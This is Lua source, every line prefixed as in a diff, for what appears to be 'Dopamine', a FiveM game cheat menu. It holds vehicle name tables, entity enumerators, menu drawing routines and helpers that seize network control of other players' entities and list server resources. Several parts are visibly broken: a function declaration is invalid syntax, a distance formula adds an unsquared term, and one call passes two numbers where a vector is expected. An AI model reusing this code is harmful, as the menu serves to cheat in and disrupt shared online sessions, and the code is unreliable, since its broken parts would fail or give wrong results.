- Dopamine.trashTables.vehiclesMotorcyclesList = { 'Akuma', 'Avarus', 'Bagger', 'Bati2', 'Bati', 'BF400', 'Blazer4', 'CarbonRS', 'Chimera', 'Cliffhanger', 'Daemon', 'Daemon2', 'Defiler', 'Deathbike', 'Deathbike2', 'Deathbike3', 'Diablous', 'Diablous2', 'Double', 'Enduro', 'esskey', 'Faggio2', 'Faggio3', 'Faggio', 'Fcr2', 'fcr', 'gargoyle', 'hakuchou2', 'hakuchou', 'hexer', 'innovation', 'Lectro', 'Manchez', 'Nemesis', 'Nightblade', 'Oppressor', 'Oppressor2', 'PCJ', 'Ratbike', 'Ruffian', 'Sanchez2', 'Sanchez', 'Sanctus', 'Shotaro', 'Sovereign', 'Thrust', 'Vader', 'Vindicator', 'Vortex', 'Wolfsbane', 'zombiea', 'zombieb' }
- Dopamine.trashTables.vehiclesMuscleList = { 'Blade', 'Buccaneer', 'Buccaneer2', 'Chino', 'Chino2', 'clique', 'Deviant', 'Dominator', 'Dominator2', 'Dominator3', 'Dominator4', 'Dominator5', 'Dominator6', 'Dukes', 'Dukes2', 'Ellie', 'Faction', 'faction2', 'faction3', 'Gauntlet', 'Gauntlet2', 'Hermes', 'Hotknife', 'Hustler', 'Impaler', 'Impaler2', 'Impaler3', 'Impaler4', 'Imperator', 'Imperator2', 'Imperator3', 'Lurcher', 'Moonbeam', 'Moonbeam2', 'Nightshade', 'Phoenix', 'Picador', 'RatLoader', 'RatLoader2', 'Ruiner', 'Ruiner2', 'Ruiner3', 'SabreGT', 'SabreGT2', 'Sadler2', 'Slamvan', 'Slamvan2', 'Slamvan3', 'Slamvan4', 'Slamvan5', 'Slamvan6', 'Stalion', 'Stalion2', 'Tampa', 'Tampa3', 'Tulip', 'Vamos,', 'Vigero', 'Virgo', 'Virgo2', 'Virgo3', 'Voodoo', 'Voodoo2', 'Yosemite' }
- Dopamine.trashTables.vehiclesOffroadList = { 'BFinjection', 'Bifta', 'Blazer', 'Blazer2', 'Blazer3', 'Blazer5', 'Bohdi', 'Brawler', 'Bruiser', 'Bruiser2', 'Bruiser3', 'Caracara', 'DLoader', 'Dune', 'Dune2', 'Dune3', 'Dune4', 'Dune5', 'Insurgent', 'Insurgent2', 'Insurgent3', 'Kalahari', 'Kamacho', 'LGuard', 'Marshall', 'Mesa', 'Mesa2', 'Mesa3', 'Monster', 'Monster4', 'Monster5', 'Nightshark', 'RancherXL', 'RancherXL2', 'Rebel', 'Rebel2', 'RCBandito', 'Riata', 'Sandking', 'Sandking2', 'Technical', 'Technical2', 'Technical3', 'TrophyTruck', 'TrophyTruck2', 'Freecrawler', 'Menacer' }
- Dopamine.trashTables.vehiclesPlanesList = { 'AlphaZ1', 'Avenger', 'Avenger2', 'Besra', 'Blimp', 'blimp2', 'Blimp3', 'Bombushka', 'Cargoplane', 'Cuban800', 'Dodo', 'Duster', 'Howard', 'Hydra', 'Jet', 'Lazer', 'Luxor', 'Luxor2', 'Mammatus', 'Microlight', 'Miljet', 'Mogul', 'Molotok', 'Nimbus', 'Nokota', 'Pyro', 'Rogue', 'Seabreeze', 'Shamal', 'Starling', 'Stunt', 'Titan', 'Tula', 'Velum', 'Velum2', 'Vestra', 'Volatol', 'Striekforce' }
- Dopamine.trashTables.vehiclesSuvsList = { 'BJXL', 'Baller', 'Baller2', 'Baller3', 'Baller4', 'Baller5', 'Baller6', 'Cavalcade', 'Cavalcade2', 'Dubsta', 'Dubsta2', 'Dubsta3', 'FQ2', 'Granger', 'Gresley', 'Habanero', 'Huntley', 'Landstalker', 'patriot', 'Patriot2', 'Radi', 'Rocoto', 'Seminole', 'Serrano', 'Toros', 'XLS', 'XLS2' }
- Dopamine.trashTables.vehiclesSedansList = { 'Asea', 'Asea2', 'Asterope', 'Cog55', 'Cogg552', 'Cognoscenti', 'Cognoscenti2', 'emperor', 'emperor2', 'emperor3', 'Fugitive', 'Glendale', 'ingot', 'intruder', 'limo2', 'premier', 'primo', 'primo2', 'regina', 'romero', 'stafford', 'Stanier', 'stratum', 'stretch', 'surge', 'tailgater', 'warrener', 'Washington' }
- Dopamine.trashTables.vehiclesServicesList = { 'Airbus', 'Brickade', 'Bus', 'Coach', 'Rallytruck', 'Rentalbus', 'taxi', 'Tourbus', 'Trash', 'Trash2', 'WastIndr', 'PBus2' }
- Dopamine.trashTables.vehiclesSportsList = { 'Alpha', 'Banshee', 'Banshee2', 'BestiaGTS', 'Buffalo', 'Buffalo2', 'Buffalo3', 'Carbonizzare', 'Comet2', 'Comet3', 'Comet4', 'Comet5', 'Coquette', 'Deveste', 'Elegy2', 'Feltzer2', 'Feltzer3', 'FlashGT', 'Furoregt', 'Fusilade', 'Futo', 'GB200', 'Hotring', 'Infernus2', 'Italigto', 'Jester', 'Jester2', 'Khamelion', 'Kurama', 'Kurama2', 'Lynx', 'MAssacro', 'MAssacro2', 'neon', 'Ninef', 'ninfe2', 'omnis', 'Pariah', 'Penumbra', 'Raiden', 'RapidGT', 'RapidGT2', 'Raptor', 'Revolter', 'Ruston', 'Schafter2', 'Schafter3', 'Schafter4', 'Schafter5', 'Schafter6', 'Schlagen', 'Schwarzer', 'Sentinel3', 'Seven70', 'Specter', 'Specter2', 'Streiter', 'Sultan', 'Surano', 'Tampa2', 'Tropos', 'Verlierer2', 'ZR380' }
- Dopamine.trashTables.vehiclesSportsClassicsList = { 'Ardent', 'BType', 'BType2', 'BType3', 'Casco', 'Cheetah2', 'Cheburek', 'Coquette2', 'Coquette3', 'Deluxo', 'Fagaloa', 'Gt500', 'JB700', 'Jester3', 'MAmba', 'Manana', 'Michelli', 'Monroe', 'Peyote', 'Pigalle', 'RapidGT3', 'Retinue', 'Savestra', 'Stinger', 'Stingergt', 'Stromberg', 'Swinger', 'Torero', 'Tornado', 'Tornado2', 'Tornado3', 'Tornado4', 'Tornado5', 'Tornado6', 'Viseris', 'Z190', 'ZType' }
- Dopamine.trashTables.vehiclesSupersList = { 'Adder', 'Autarch', 'Bullet', 'Cheetah', 'Cyclone', 'Elegy', 'EntityXF', 'Entity2', 'FMJ', 'GP1', 'Infernus', 'LE7B', 'Nero', 'Nero2', 'Osiris', 'Penetrator', 'PFister811', 'Prototipo', 'Reaper', 'SC1', 'Scramjet', 'Sheava', 'SultanRS', 'Superd', 'T20', 'Taipan', 'Tempesta', 'Tezeract', 'Turismo2', 'Turismor', 'Tyrant', 'Tyrus', 'Vacca', 'Vagner', 'Vigilante', 'Visione', 'Voltic', 'Voltic2', 'Zentorno', 'Italigtb', 'Italigtb2', 'XA21' }
- Dopamine.trashTables.vehiclesTrailersList = { 'ArmyTanker', 'ArmyTrailer', 'ArmyTrailer2', 'BaleTrailer', 'BoatTrailer', 'CableCar', 'DockTrailer', 'Graintrailer', 'Proptrailer', 'Raketailer', 'TR2', 'TR3', 'TR4', 'TRFlat', 'TVTrailer', 'Tanker', 'Tanker2', 'Trailerlogs', 'Trailersmall', 'Trailers', 'Trailers2', 'Trailers3' }
- Dopamine.trashTables.vehiclesTrainsList = { 'Freight', 'Freightcar', 'Freightcont1', 'Freightcont2', 'Freightgrain', 'Freighttrailer', 'TankerCar' }
- Dopamine.trashTables.vehiclesWorkList = { 'Airtug', 'Caddy', 'Caddy2', 'Caddy3', 'Docktug', 'Forklift', 'Mower', 'Ripley', 'Sadler', 'Scrap', 'TowTruck', 'Towtruck2', 'Tractor', 'Tractor2', 'Tractor3', 'TrailerLArge2', 'Utilitruck', 'Utilitruck3', 'Utilitruck2' }
- Dopamine.trashTables.vehiclesVansList = { 'Bison', 'Bison2', 'Bison3', 'BobcatXL', 'Boxville', 'Boxville2', 'Boxville3', 'Boxville4', 'Boxville5', 'Burrito', 'Burrito2', 'Burrito3', 'Burrito4', 'Burrito5', 'Camper', 'GBurrito', 'GBurrito2', 'Journey', 'Minivan', 'Minivan2', 'Paradise', 'pony', 'Pony2', 'Rumpo', 'Rumpo2', 'Rumpo3', 'Speedo', 'Speedo2', 'Speedo4', 'Surfer', 'Surfer2', 'Taco', 'Youga', 'youga2' }
- Dopamine.trashTables.fullVehiclesList = { Dopamine.trashTables.vehiclesAddonsList, Dopamine.trashTables.vehiclesBoatsList, Dopamine.trashTables.vehiclesTruckList, Dopamine.trashTables.vehiclesCompactsList, Dopamine.trashTables.vehiclesCoupesList, Dopamine.trashTables.vehiclesBicyclesList, Dopamine.trashTables.vehiclesEmergencyList, Dopamine.trashTables.vehiclesHelicoptersList, Dopamine.trashTables.vehiclesIndustrialsList, Dopamine.trashTables.vehiclesMilitaryVehicles, Dopamine.trashTables.vehiclesMotorcyclesList, Dopamine.trashTables.vehiclesMuscleList, Dopamine.trashTables.vehiclesOffroadList, Dopamine.trashTables.vehiclesPlanesList, Dopamine.trashTables.vehiclesSuvsList, Dopamine.trashTables.vehiclesSedansList, Dopamine.trashTables.vehiclesServicesList, Dopamine.trashTables.vehiclesSportsList, Dopamine.trashTables.vehiclesSportsClassicsList, Dopamine.trashTables.vehiclesSupersList, Dopamine.trashTables.vehiclesTrailersList, Dopamine.trashTables.vehiclesTrainsList, Dopamine.trashTables.vehiclesWorkList, Dopamine.trashTables.vehiclesVansList }
- local oTable = {} do function oTable.insert(t, k, v) if not rawget(t._values, k) then t._keys[#t._keys + 1] = k end if v == nil then oTable.remove(t, k) else t._values[k] = v end end local function find(t, value) for i,v in ipairs(t) do if v == value then return i end end end function oTable.remove(t, k) local v = t._values[k] if v ~= nil then table.remove(t._keys, find(t._keys, k)) t._values[k] = nil end return v end function oTable.index(t, k) return rawget(t._values, k) end function oTable.pairs(t) local i = 0 return function() i = i + 1 local key = t._keys[i] if key ~= nil then return key, t._values[key] end end end function init = init or {} local t = {_keys={}, _values={}} local n = #init if n % 2 ~= 0 then error'in oTable initialization: key is missing value' end for i=1,n/2 do local k = init[i * 2 - 1] local v = init[i * 2] if t._values[k] ~= nil then error('duplicate key:'..k) end t._keys[#t._keys + 1] = k t._values[k] = v end return setmetatable(t, {__newindex=oTable.insert, __len=function(t) return #t._keys end, __pairs=oTable.pairs, __index=t._values }) end end
- local entityEnumerator = { __gc = function(enum) if enum.destructor and enum.handle then enum.destructor(enum.handle) end enum.destructor = nil enum.handle = nil end }
- Dopamine.trashFunctions.enumEntities = function(initFunc, moveFunc, disposeFunc) return coroutine.wrap(function() local iter, id = initFunc() if not id or id == 0 then disposeFunc(iter) return end local enum = {handle = iter, destructor = disposeFunc} setmetatable(enum, entityEnumerator) local next = true repeat coroutine.yield(id) next, id = moveFunc(iter) until not next enum.destructor, enum.handle = nil, nil disposeFunc(iter) end) end
- Dopamine.trashFunctions.enumObjects = function() return Dopamine.trashFunctions.enumEntities(FindFirstObject, FindNextObject, EndFindObject) end
- Dopamine.trashFunctions.enumPeds = function() return Dopamine.trashFunctions.enumEntities(FindFirstPed, FindNextPed, EndFindPed) end
- Dopamine.trashFunctions.enumVehicles = function() return Dopamine.trashFunctions.enumEntities(FindFirstVehicle, FindNextVehicle, EndFindVehicle) end
- Dopamine.trashFunctions.EnumeratePickups = function() return Dopamine.trashFunctions.enumEntities(FindFirstPickup, FindNextPickup, EndFindPickup) end
- Dopamine.trashFunctions.reqControlOnce = function(entity) if not NetworkIsInSession() or NetworkHasControlOfEntity(entity) then return true end SetNetworkIdCanMigrate(NetworkGetNetworkIdFromEntity(entity), true) return NetworkRequestControlOfEntity(entity) end
- Dopamine.trashFunctions.rotationToDirection = function(rotation) local retz = math.rad(rotation.z) local retx = math.rad(rotation.x) local absx = math.abs(math.cos(retx)) return vector3(-math.sin(retz) * absx, math.cos(retz) * absx, math.sin(retx)) end
- Dopamine.trashFunctions.screenToWrld = function(screenCoord) local camRot = GetGameplayCamRot(2) local camPos = GetGameplayCamCoord() local vect2x = 0.0 local vect2y = 0.0 local vect21y = 0.0 local vect21x = 0.0 local direction = Dopamine.trashFunctions.rotationToDirection(camRot) local vect3 = vector3(camRot.x + 10.0, camRot.y + 0.0, camRot.z + 0.0) local vect31 = vector3(camRot.x - 10.0, camRot.y + 0.0, camRot.z + 0.0) local vect32 = vector3(camRot.x, camRot.y + 0.0, camRot.z + -10.0) local direction1 = Dopamine.trashFunctions.rotationToDirection(vector3(camRot.x, camRot.y + 0.0, camRot.z + 10.0)) - Dopamine.trashFunctions.rotationToDirection(vect32) local direction2 = Dopamine.trashFunctions.rotationToDirection(vect3) - Dopamine.trashFunctions.rotationToDirection(vect31) local radians = -(math.rad(camRot.y)) vect33 = (direction1 * math.cos(radians)) - (direction2 * math.sin(radians)) vect34 = (direction1 * math.sin(radians)) - (direction2 * math.cos(radians)) local case1, x1, y1 = Dopamine.trashFunctions.worldToScreenRel(((camPos + (direction * 10.0)) + vect33) + vect34) if not case1 then vect2x = x1 vect2y = y1 return camPos + (direction * 10.0) end local case2, x2, y2 = Dopamine.trashFunctions.worldToScreenRel(camPos + (direction * 10.0)) if not case2 then vect21x = x2 vect21y = y2 return camPos + (direction * 10.0) end if math.abs(vect2x - vect21x) < 0.001 or math.abs(vect2y - vect21y) < 0.001 then return camPos + (direction * 10.0) end local x = (screenCoord.x - vect21x) / (vect2x - vect21x) local y = (screenCoord.y - vect21y) / (vect2y - vect21y) return ((camPos + (direction * 10.0)) + (vect33 * x)) + (vect34 * y) end
- Dopamine.trashFunctions.subVectors = function(vect1, vect2) return vector3(vect1.x - vect2.x, vect1.y - vect2.y, vect1.z - vect2.z) end
- Dopamine.trashFunctions.GetCamDirFromScreenCenter = function() local pos = GetGameplayCamCoord() local world = Dopamine.trashFunctions.screenToWrld(0, 0) local ret = Dopamine.trashFunctions.subVectors(world, pos) return ret end
- Dopamine.trashFunctions.worldToScreenRel = function(worldCoords) local check, x, y = GetScreenCoordFromWorldCoord(worldCoords.x, worldCoords.y, worldCoords.z) if not check then return false end screenCoordsx = (x - 0.5) * 2.0 screenCoordsy = (y - 0.5) * 2.0 return true, screenCoordsx, screenCoordsy end
- Dopamine.trashFunctions.returnRGB = function(l) local rgb = {} local n = GetGameTimer() / 200 rgb.r = math.floor(math.sin(n * l + 0) * 127 + 128) rgb.g = math.floor(math.sin(n * l + 2) * 127 + 128) rgb.b = math.floor(math.sin(n * l + 4) * 127 + 128) return rgb end
- Dopamine.trashFunctions.weaponNameFromHash = function(hash) for i = 1, #Dopamine.trashTables.weaponsModels do if GetHashKey(Dopamine.trashTables.weaponsModels[i]) == hash then return string.sub(Dopamine.trashTables.weaponsModels[i], 8) end end end
- Dopamine.trashFunctions.scaleVector = function(vect, mult) return vector3(vect.x * mult, vect.y * mult, vect.z * mult) end
- Dopamine.trashFunctions.addVector = function(vect1, vect2) return vector3(vect1.x + vect2.x, vect1.y + vect2.y, vect1.z + vect2.z) end
- Dopamine.trashFunctions.multiplyVector = function(coords, coordz) return vector3(coords.x * coordz, coords.y * coordz, coords.z * coordz) end
- Dopamine.trashFunctions.forceOscillate = function(entity, position, angleFreq, dampRatio) local pos1 = Dopamine.trashFunctions.scaleVector(Dopamine.trashFunctions.subVectors(position, GetEntityCoords(entity)), (angleFreq * angleFreq)) local pos2 = Dopamine.trashFunctions.addVector(Dopamine.trashFunctions.scaleVector(GetEntityVelocity(entity), (2.0 * angleFreq * dampRatio)), vector3(0.0, 0.0, 0.1)) local targetPos = Dopamine.trashFunctions.subVectors(pos1, pos2) ApplyForceToEntity(entity, 3, targetPos, 0, 0, 0, false, false, true, true, false, true) end
- Dopamine.trashFunctions.getDistance = function(pointA, pointB) local aX = pointA.x local aY = pointA.y local aZ = pointA.z local bX = pointB.x local bY = pointB.y local bZ = pointB.z local xBA = bX - aX local yBA = bY - aY local zBA = bZ - aZ local y2 = yBA * yBA local x2 = xBA * xBA local sum2 = y2 + x2 return math.sqrt(sum2 + zBA) end
- Dopamine.trashFunctions.initIntro = function(scaleform, message) local scaleform = RequestScaleformMovie(scaleform) while not HasScaleformMovieLoaded(scaleform) do pWait(1) end PushScaleformMovieFunction(scaleform, 'SHOW_SHARD_WASTED_MP_MESSAGE') PushScaleformMovieFunctionParameterString(message) PopScaleformMovieFunctionVoid() return scaleform end
- Dopamine.trashFunctions.math_round = function(num, numDecimalPlaces)
- return tonumber(string.format('%.' .. (numDecimalPlaces or 0) .. 'f', num))
- end
- Dopamine.trashFunctions.table_removekey = function(array, element)
- for i = 1, #array do
- if array[i] == element then
- table.remove(array, i)
- end
- end
- end
- Dopamine.trashFunctions.table_includes = function(table, element)
- for _, value in pairs(table) do
- if value == element then
- return true
- end
- end
- return false
- end
- do
- local NumberCharset = {}
- local Charset = {}
- for i = 48, 57 do table.insert(NumberCharset, string.char(i)) end
- for i = 65, 90 do table.insert(Charset, string.char(i)) end
- for i = 97, 122 do table.insert(Charset, string.char(i)) end
- Dopamine.trashFunctions.getRandomNumber = function(length)
- pWait(0)
- math.randomseed(GetGameTimer())
- if length > 0 then
- return Dopamine.trashFunctions.getRandomNumber(length - 1) .. NumberCharset[math.random(1, #NumberCharset)]
- else
- return ''
- end
- end
- Dopamine.trashFunctions.getRandomLetter = function(length)
- pWait(0)
- math.randomseed(GetGameTimer())
- if length > 0 then
- return Dopamine.trashFunctions.getRandomLetter(length - 1) .. Charset[math.random(1, #Charset)]
- else
- return ''
- end
- end
- end
- Dopamine.trashFunctions.keyboardInput = function(TextEntry, ExampleText, MaxStringLength)
- Dopamine.natives.addTextEntry('FMMC_KEY_TIP1', TextEntry .. ':')
- Dopamine.natives.displayOnscreenKeyboard(1, 'FMMC_KEY_TIP1', '', ExampleText, '', '', '', MaxStringLength)
- blockinput = true
- while Dopamine.natives.updateOnscreenKeyboard() ~= 1 and Dopamine.natives.updateOnscreenKeyboard() ~= 2 do
- pWait(0)
- end
- if Dopamine.natives.updateOnscreenKeyboard() ~= 2 then
- local result = GetOnscreenKeyboardResult()
- pWait(500)
- blockinput = false
- return result
- else
- pWait(500)
- blockinput = false
- return nil
- end
- end
- Dopamine.trashFunctions.getPlayerStatus = function(target)
- local maxHealth = GetEntityMaxHealth(target)
- local currentHealth = GetEntityHealth(target)
- if currentHealth >= 1 then
- return ' [~g~Alive~m~] [~g~'..currentHealth..'~m~/~g~'..maxHealth..'~m~]'
- else
- return ' [~r~Dead~m~] [~r~'..currentHealth..'~m~/~r~'..maxHealth..'~m~]'
- end
- end
- Dopamine.trashFunctions.getResources = function()
- local resources = {}
- for i=0, GetNumResources() do
- resources[i] = GetResourceByFindIndex(i)
- end
- return resources
- end
- function Dopamine.debugPrint(text)
- if Dopamine.debug then
- Citizen.Trace('[d'..'opamine] '..tostring(text)..'.\n')
- end
- end
- function Dopamine.setMenuProperty(id, property, value)
- if id and Dopamine.menuProps.shitMenus[id] then
- Dopamine.menuProps.shitMenus[id][property] = value
- Dopamine.debugPrint(id..' menu property changed: { '..tostring(property)..', '..tostring(value)..' }')
- end
- end
- function Dopamine.isMenuVisible(id)
- if id and Dopamine.menuProps.shitMenus[id] then
- return Dopamine.menuProps.shitMenus[id].visible
- else
- return false
- end
- end
- function Dopamine.setMenuVisible(id, visible, holdCurrent)
- if id and Dopamine.menuProps.shitMenus[id] then
- Dopamine.setMenuProperty(id, 'visible', visible)
- if not holdCurrent and Dopamine.menuProps.shitMenus[id] then
- Dopamine.setMenuProperty(id, 'currentOption', 1)
- end
- if visible then
- if id ~= Dopamine.menuProps.currentMenu and Dopamine.isMenuVisible(Dopamine.menuProps.currentMenu) then
- Dopamine.setMenuVisible(Dopamine.menuProps.currentMenu, false)
- end
- Dopamine.menuProps.currentMenu = id
- end
- end
- end
- function Dopamine.DrawTxt(text, x, y, scale, size, color)
- Dopamine.natives.setTextColour(color.r, color.g, color.b, color.a)
- Dopamine.natives.setTextFont(4)
- SetTextCentre()
- Dopamine.natives.setTextProportional(1)
- Dopamine.natives.setTextScale(scale, size)
- SetTextDropshadow(0, 0, 0, 0, 255)
- SetTextEdge(2, 0, 0, 0, 255)
- Dopamine.natives.setTextDropShadow()
- if Dopamine.menuProps.menu_TextOutline then
- Dopamine.natives.setTextOutline()
- end
- Dopamine.natives.beginTextCommandDisplayText('STRING')
- Dopamine.natives.addTextComponentSubstringPlayerName(text)
- Dopamine.natives.endTextCommandDisplayText(x, y)
- end
- function Dopamine.drawText(text, x, y, font, color, scale, center, shadow, alignRight)
- Dopamine.natives.setTextColour(color.r, color.g, color.b, color.a)
- if Dopamine.menuProps.menu_TextDropShadow then
- Dopamine.natives.setTextDropShadow(0, 0, 0, 0,255)
- end
- SetTextEdge(2, 0, 0, 0, 255)
- if Dopamine.menuProps.menu_TextOutline then
- Dopamine.natives.setTextOutline()
- end
- Dopamine.natives.setTextFont(font)
- Dopamine.natives.setTextScale(scale, scale)
- if shadow then
- Dopamine.natives.setTextDropShadow(2, 2, 0, 0, 0)
- end
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- if center then
- SetTextCentre(center)
- elseif alignRight then
- SetTextWrap(Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width - Dopamine.menuProps.buttonTextXOffset)
- SetTextRightJustify(true)
- end
- end
- Dopamine.natives.beginTextCommandDisplayText('STRING')
- Dopamine.natives.addTextComponentSubstringPlayerName(text)
- Dopamine.natives.endTextCommandDisplayText(x, y)
- end
- function Dopamine.drawRect(x, y, width, height, color)
- Dopamine.natives.drawRect(x, y, width, height, color.r, color.g, color.b, color.a)
- end
- function Dopamine.drawTitle()
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- local x = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width / 2
- local xText = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width * Dopamine.menuProps.titleXOffset
- local y = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].y + Dopamine.menuProps.titleHeight * 1/Dopamine.menuProps.titleSpacing
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].titleBackgroundSprite then
- DrawSprite(Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].titleBackgroundSprite.dict, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu], x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.titleHeight, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- else
- Dopamine.drawRect(x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.titleHeight, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].titleBackgroundColor)
- end
- Dopamine.drawText(Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].title, xText, y - Dopamine.menuProps.titleHeight / 2 + Dopamine.menuProps.titleYOffset, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].titleFont, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].titleColor, Dopamine.menuProps.titleScale, true)
- Dopamine.drawText(Dopamine.menuProps._mVersion, xText + 0.2, y - Dopamine.menuProps.titleHeight / 2 + Dopamine.menuProps.titleYOffset + 0.020, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].titleFont, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].titleColor, Dopamine.menuProps.titleScale - 0.3, true)
- end
- end
- function Dopamine.drawSubTitle()
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- local x = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width / 2
- local y = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].y + Dopamine.menuProps.titleHeight + Dopamine.menuProps.buttonHeight / 2
- local subTitleColor = { r = Dopamine.mainColor.r, g = Dopamine.mainColor.g, b = Dopamine.mainColor.b, a = 255 }
- Dopamine.drawRect(x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.buttonHeight, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].subTitleBackgroundColor)
- Dopamine.drawText(Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].subTitle, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset, y - Dopamine.menuProps.buttonHeight / 2 + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, subTitleColor, Dopamine.menuProps.buttonScale, false)
- --[[Dopamine.drawText(Dopamine.menuProps._mVersion, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.232, y - Dopamine.menuProps.buttonHeight / 2 + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, subTitleColor, Dopamine.menuProps.buttonScale, true)]]
- if Dopamine.menuProps.optionCount > Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount then
- Dopamine.drawText(tostring(Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption)..' / '..tostring(Dopamine.menuProps.optionCount), Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, y - Dopamine.menuProps.buttonHeight / 2 + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, subTitleColor, Dopamine.menuProps.buttonScale, false, false, true)
- end
- end
- end
- function Dopamine.drawButton(arrowsprite, text, subText, spriteData)
- local x = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width / 2
- local multiplier = nil
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount and Dopamine.menuProps.optionCount <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount then
- multiplier = Dopamine.menuProps.optionCount
- elseif Dopamine.menuProps.optionCount > Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption - Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount and Dopamine.menuProps.optionCount <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption then
- multiplier = Dopamine.menuProps.optionCount - (Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption - Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount)
- end
- if multiplier then
- local y = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].y + Dopamine.menuProps.titleHeight + Dopamine.menuProps.buttonHeight + (Dopamine.menuProps.buttonHeight * multiplier) - Dopamine.menuProps.buttonHeight / 2
- local backgroundColor = nil
- local textColor = nil
- local subTextColor = nil
- local shadow = false
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount then
- backgroundColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuFocusBackgroundColor
- textColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuFocusTextColor
- subTextColor = {r = Dopamine.mainColor.r, g = Dopamine.mainColor.g, b = Dopamine.mainColor.b, a = 255}
- else
- backgroundColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuBackgroundColor
- textColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuTextColor
- subTextColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuSubTextColor
- shadow = true
- end
- Dopamine.drawRect(x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.buttonHeight, backgroundColor)
- if spriteData then
- if not HasStreamedTextureDictLoaded(spriteData.dict) then Dopamine.natives.requestStreamedTextureDict(spriteData.dict, true) end
- if Dopamine.menuProps.menu_TextOutline then
- DrawSprite(spriteData.dict, spriteData.text, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.008, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0275, 0.0375, 0.0, 0, 0, 0, 255)
- end
- if Dopamine.menuProps.selectedTheme ~= 'Classic' then
- DrawSprite(spriteData.dict, spriteData.text, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.008, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0255, 0.0355, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 155)
- end
- DrawSprite(spriteData.dict, spriteData.text, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.008, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0225, 0.0325, 0.0, spriteData.color.r, spriteData.color.g, spriteData.color.b, 255)
- Dopamine.drawText(text, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.018, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, textColor, Dopamine.menuProps.buttonScale, false, shadow)
- else
